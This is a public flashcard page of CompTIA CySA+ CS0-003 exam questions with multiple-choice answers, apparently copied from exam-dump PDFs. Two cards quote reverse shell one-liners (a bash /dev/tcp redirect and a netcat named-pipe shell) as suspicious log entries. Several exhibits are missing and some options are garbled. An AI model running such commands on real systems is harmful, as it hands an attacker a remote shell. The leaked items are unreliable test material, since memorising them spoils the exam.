Back to overview

CompTIA CySA+ CS03

All questions without description (e.g. Question #1) are from the premium version of Exam Topics. I always choosed the community answer if possible for them. The rest is from the specific documents, written in the header of each question.

Subject
No category / Others
Language of creation
English
342 flashcards No ratings yet 0 views
Add to my sets

Sign in to add this set to your collection. You will return here afterwards.

Cards in this set

Card 261

Question

CompTIA.CS0-003.vJan-2024.by_.Lena_.91q.pdf

Question #72

A Chief Information Security Officer wants to map all the attack vectors that the company faces each day. Which of the following recommendations should the company align their security controls around?

 

Answer

  • D. MITRE ATT&CK
  • A. OSSTMM
  • B. Diamond Model Of Intrusion Analysis
  • C. OWASP

Card 262

Question

CompTIA.CS0-003.vJan-2024.by_.Lena_.91q.pdf

Question #74

An analyst is evaluating the following vulnerability report:


Which of the following vulnerability report sections provides information about the level of impact on data confidentiality if a successful exploitation occurs?

 

Answer

  • B. Metrics
  • C. Vulnerability
  • A. Payloads
  • D. Profile

Card 263

Question

CompTIA.CS0-003.vJan-2024.by_.Lena_.91q.pdf

Question #75

Which of the following best describes the importance of implementing TAXII as part of a threat intelligence program?

 

Answer

  • A. It provides a structured way to gain information about insider threats.
  • D. It is a semi-automated solution to gather threat intellbgence about competitors in the same sector.
  • C. It exchanges messages in the most cost-effective way and requires little maintenance once implemented.
  • B. It proactively facilitates real-time information sharing between the public and private sectors.

Card 264

Question

CompTIA.CS0-003.vJan-2024.by_.Lena_.91q.pdf

Question #76

During a recent site survey. an analyst discovered a rogue wireless access point on the network.
Which of the following actions should be taken first to protect the network while preserving evidence?
 

Answer

  • B. Connect to the access point and examine its log files.
  • A. Run a packet sniffer to monitor traffic to and from the access point.
  • C. Identify who is connected to the access point and attempt to find the attacker.
  • D. Disconnect the access point from the network

Card 265

Question

CompTIA.CS0-003.vJan-2024.by_.Lena_.91q.pdf

Question #77

While a security analyst for an organization was reviewing logs from web servers. the analyst found several successful attempts to downgrade HTTPS sessions to use cipher modes of operation susceptible to padding oracle
attacks. Which of the following combinations of configuration changes should the organization make to remediate this issue? (Select two)
 

Answer

  • B. Remove cipher suites that use CBC.
  • C. Configure the server to prefer ephemeral modes for key exchange.
  • A. Configure the server to prefer TLS 1.3.
  • E. Configure the server to require HSTS.
  • D. Require client browsers to present a user certificate for mutual authentication.
  • F. Remove cipher suites that use GCM.

Card 266

Question

CompTIA.CS0-003.vJan-2024.by_.Lena_.91q.pdf

Question #78

An analyst views the following log entries:


The organization has a partner vendor with hosts in the 216.122.5.x range. This partner vendor is required to have access to monthly reports and is the only external vendor with authorized access.
The organization prioritizes incident investigation according to the following hierarchy: unauthorized data disclosure is more critical than denial of service attempts.
which are more important than ensuring vendor data access.
Based on the log files and the organization's priorities, which of the following hosts warrants additional investigation?
 

Answer

  • D. 216.122.5.5
  • C. 202.180.1582
  • B. 134.17.188.5
  • A. 121.19.30.221

Card 267

Question

CompTIA.CS0-003.vJan-2024.by_.Lena_.91q.pdf

Question #80

A security analyst needs to mitigate a known, exploited vulnerability related not tack vector that embeds software through the USB interface. Which of the following should the analyst do first?

 

Answer

  • B. Write a removable media policy that explains that USBs cannot be connected to a company asset.
  • A. Conduct security awareness training on the risks of using unknown and unencrypted USBs.
  • C. Check configurations to determine whether USB ports are enabled on company assets.
  • D. Review logs to see whether this exploitable vulnerability has already impacted the company.

Card 268

Question

CompTIA.CS0-003.vJan-2024.by_.Lena_.91q.pdf

Question #81

A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to minimize the number of unique firewall rules. Which of the
following scanning techniques would be most efficient to achieve the objective?
 

Answer

  • A. Deploy agents on all systems to perform the scans.
  • B. Deploy a central scanner and perform non-credentialed scans.
  • D. Deploy a scanner sensor on every segment and perform credentialed scans.
  • C. Deploy a cloud-based scanner and perform a network scan.

Card 269

Question

CompTIA.CS0-003.vJan-2024.by_.Lena_.91q.pdf

Question #82

A security analyst identified the following suspicious entry on the host-based IDS logs:
bash -i >& /dev/tcp/10.1.2.3/8080 0>&1
Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?
 

Answer

  • B. #!/bin/bash ps -fea | grep 8080 >dev/null && echo 'Malicious activity' I| echo 'OK'
  • A. #!/bin/bash nc 10.1.2.3 8080 -vv >dev/null && echo 'Malicious activity' Il echo 'OK'
  • C. #!/bin/bash ls /opt/tcp/10.1.2.3/8080 >dev/null && echo 'Malicious activity' I| echo 'OK'
  • D. #!/bin/bash netstat -antp Igrep 8080 >dev/null && echo 'Malicious activity' I| echo 'OK'

Card 270

Question

CompTIA.CS0-003.vJan-2024.by_.Lena_.91q.pdf

Question #88

A disgruntled open-source developer has decided to sabotage a code repository with a logic bomb that will act as a wiper. Which of the following parts of the Cyber Kill Chain does this act exhibit?

 

Answer

  • B. Weaponization
  • C. Exploitation
  • A. Reconnaissance
  • D. Installation

Card 271

Question

CompTIA.CS0-003.vJan-2024.by_.Lena_.91q.pdf

Question #89

Following an incident, a security analyst needs to create a script for downloading the configuration of all assets from the cloud tenancy. Which of the following authentication methods should the analyst use?

 

Answer

  • A. MFA
  • B. User and password
  • C. PAM
  • D. Key pair

Card 272

Question

CompTIA.CS0-003.vJan-2024.by_.Lena_.91q.pdf

Question #90

A security analyst detected the following suspicious activity:
rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f
Which of the following most likely describes the activity?
 

Answer

  • A. Network pivoting
  • B. Host scanning
  • C. Privilege escalation
  • D. Reverse shell

Card 273

Question

CompTIA.CS0-003.vJan-2024.by_.Lena_.91q.pdf

Question #91

Which of the following can be used to learn more about TTPs used by cybercriminals?

 

Answer

  • C. National Institute of Standards and Technology
  • D. theHarvester
  • A. ZenMAP
  • B. MITRE ATT&CK

Card 274

Question

CompTIA-CS0-003 ,27.01.24-unlocked.pdf

Question #7

During an incident, analysts need to rapidly investigate by the investigation and leadership teams. Which of
the following best describes how PII should be safeguarded during an incident?
 

Answer

  • A. Implement data encryption and close the data so only the company has access.
  • C. Implement data encryption and create a standardized procedure for deleting data that is no longer needed.
  • B. Ensure permissions are limited in the investigation team and encrypt the data.
  • D. Ensure that permissions are open only to the company.

Card 275

Question

CompTIA-CS0-003 ,27.01.24-unlocked.pdf

Question #8

A security analyst receives an alert for suspicious activity on a company laptop An excerpt of the log is shown below:
 

Which of the following has most likely occurred?

 

Answer

  • D. A web browser vulnerability was exploited.
  • B. A credential-stealing website was visited.
  • A. An Office document with a malicious macro was opened.
  • C. A phishing link in an email was clicked

Card 276

Question

CompTIA-CS0-003 ,27.01.24-unlocked.pdf

Question #10

A security analyst has found a moderate-risk item in an organization's point-of-sale application. The
organization is currently in a change freeze window and has decided that the risk is not high enough to correct
at this time. Which of the following inhibitors to remediation does this scenario illustrate?
 

Answer

  • C. Degrading functionality
  • D. Proprietary system
  • B. Business process interruption
  • A. Service-level agreement

Card 277

Question

CompTIA-CS0-003 ,27.01.24-unlocked.pdf

Question #12

A SOC analyst is analyzing traffic on a network and notices an unauthorized scan. Which of the following types of activities is being observed?
 

Answer

  • A. Potential precursor to an attack
  • B. Unauthorized peer-to-peer communication
  • D. System updates
  • C. Rogue device on the network

Card 278

Question

CompTIA-CS0-003 ,27.01.24-unlocked.pdf

Question #13

A security manager is looking at a third-party vulnerability metric (SMITTEN) to improve upon the
company's current method that relies on CVSSv3. Given the following:
 

Which of the following vulnerabilities should be prioritized?

Answer

  • D. Vulnerability 4
  • C. Vulnerability 3
  • B. Vulnerability 2
  • A. Vulnerability 1

Card 279

Question

CompTIA-CS0-003 ,27.01.24-unlocked.pdf

Question #22

A security analyst needs to provide evidence of regular vulnerability scanning on the company's network for
an auditing process. Which of the following is an example of a tool that can produce such evidence?

Answer

  • B. Burp Suite
  • D. Wireshark
  • C. Nmap
  • A. OpenVAS

Card 280

Question

CompTIA-CS0-003 ,27.01.24-unlocked.pdf

Question #27

A security analyst has identified a new malware file that has impacted the organization. The malware is olymorphic and has built-in conditional triggers that require a connection to the internet. The CPU has an idle process of at least 70%.

Which of the following best describes how the security analyst can effectively review the malware without compromising the organization's network?
 

Answer

  • A. Utilize an RDP session on an unused workstation to evaluate the malware.
  • B. Disconnect and utilize an existing infected asset off the network.
  • C. Create a virtual host for testing on the security analyst workstation.
  • D. Subscribe to an online service to create a sandbox environment.

How to use this set

Read the preview and check whether the content and answers suit your learning goal. You can add the public set to your sets to study it. Your account shows the available actions.

Rejoining the server...

Rejoin failed... trying again in seconds.

Failed to rejoin.
Please retry or reload the page.

The session has been paused by the server.

Failed to resume the session.
Please reload the page.